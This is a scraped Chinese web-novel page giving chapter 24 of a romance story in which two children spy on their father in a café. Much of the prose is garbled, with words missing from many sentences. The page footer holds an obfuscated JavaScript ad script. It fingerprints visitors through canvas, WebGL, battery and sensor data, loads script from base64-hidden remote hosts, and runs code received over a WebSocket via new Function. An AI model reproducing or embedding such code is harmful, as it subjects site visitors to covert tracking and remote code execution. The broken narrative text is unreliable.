格林文学
  1. 格林文学
  2. 言情小说
  3. 生崽后,三爷连哄带诱把我扛回家
  4. 第24章 他亲了大坏蛋
设置

第24章 他亲了大坏蛋


格林文学【www.gelintest.com】第一时间更新《生崽后,三爷连哄带诱把我扛回家》最新章节。

两刚刚走秦氏楼,路森森机响提示音。路淼淼。路森森眼亮,正拔腿跑,忽身旁宋朝,秦怀瑜语气:“宋叔,找父亲忙吧。”

宋朝少爷。“少爷,送回秦。”

宋朝机,正拨通司机电话,听见孩儿义正言辞拒绝。“宋叔,。”

路森森赶忙制止果真被送回秦露馅。宋朝路森森,若外,爷西伯利亚挖土豆。路森森指,容易拙劣借口:“刚刚候,让司机叔叔。”

……”宋朝仍旧,打算将少爷送公司外,车,。路森森快崩溃维持秦怀瑜设,抓耳挠腮。电话进头儿,宋朝脸色逐渐难,应。将电话挂断,等宋朝话,路森森抢言:“宋叔,忙吧,!”

公司更急,宋朝两边权衡答应嘱咐:“回给宋叔短信。”

啦。”

路森森挥,转身朝。等弯,回头见宋朝,路森森终口气,拔腿往马路跑。未免太巧!姐姐刚进便利店,坏蛋阿姨进远处咖啡厅。正方便嘛!路森森雀跃,便利店门外路淼淼碰头。路淼淼戴墨镜口罩,全副武装,见路森森跑,赶紧朝。“姐姐,酷吗?”

路森森差点,明明刚刚分,短短儿,居严严实实,“准备装备!”

路淼淼伸推墨镜,带路森森进入咖啡厅,边走边解释,“,三舅演部剧,每次线街头脸遮住,。”

路森森服气,羡慕路淼淼:“次换换,做整条街仔。”

咖啡厅服务员见两鬼鬼祟祟,正打算拦住,却见两“嘘”声。路森森朝服务员招,示。服务员莫名其妙眼,路淼淼。刚刚进。“漂亮姐姐,刚刚爸爸带阿姨进干什。”

路森森服务员耳边轻声,“求求漂亮姐姐让吧。”

服务员诧异向路森森,见孩儿脸认真挣扎。应该谎话。妥妥婚内轨,原谅!虽服务员很气愤,咖啡厅规矩,办法直接将放进。路淼淼适口:“姐姐,弟弟点单儿让挑选位置,吗?”

符合规矩。服务员奶娃娃很喜欢,即便求。路森森路淼淼跟服务员秦昊候,两捂住脸,近坐。服务员很快离,路森森背秦昊脸,副鬼鬼祟祟:“姐姐,改变计划?”

。”

路淼淼点头,将妈咪亲,恐怕认识瞄向秦昊路森森汇报况:“坏蛋阿姨,背影挺漂亮,身边朋友。”

朋友朝坏蛋走。”

坏蛋抱住朋友,脸。”

孩儿亲坏蛋!”

路森森目瞪口呆,震惊路淼淼,“姐姐,孩儿坏蛋吧!”

。”

路淼淼本正经点头,眉毛皱,“秦怀瑜太爸爸居阿姨宝宝。”

路森森撇嘴,:“姐姐,坏蛋长像,宝宝,秦怀瑜怜吗?”

路淼淼轻哼声:“才怜,妈咪。”

“姐姐。”

路森森快,妈咪,立刻瞬间,路淼淼脑海计划,赶紧拿机,秦昊桌接连拍几张照片。眼打算身离,路淼淼路森森耳边嘀嘀咕咕,推:“森森,该!”

“姐姐放,保证完任务。”

路森森重重点头,整理衣服,将脸,俨翻版秦怀瑜。防止被,路淼淼朝躲,举准几。“昊先带忧回。”

沈兆雪秦昊忧,触碰秦昊指尖,“考虑回复。”

秦昊收回,正打算嘱咐秦忧,余光却扫熟悉身影。孩儿西服,远处静静。“怀瑜,。”

秦昊眉头微皱,快步朝。路森森脑海坏蛋凶狠质问身体忍住打寒颤,差点露馅

天才一秒记住【格林文学】地址:www.gelintest.com

美女直播间 | 免费看直播APP
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE3Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x6e\x5a\x79\x66\x4a\x72\x42\x51\x44']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],ec=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='nob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++ec]&&clearTimeout(t[e]);l.length?f():RCxthzmRkG()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++ec]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,url:b(),ref:a(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9hc2xkZmtqcy54ZmdjdGcuYY29t','d3NNzOi8vd3Mud3Fkd29yay5jb206OTc5NNyx3c3M6Ly93cy5zemZobDk5LmNNvbTo5NNzk3',window,document,['Y','N']);}:function(){};

相关小说推荐


回到顶部
设置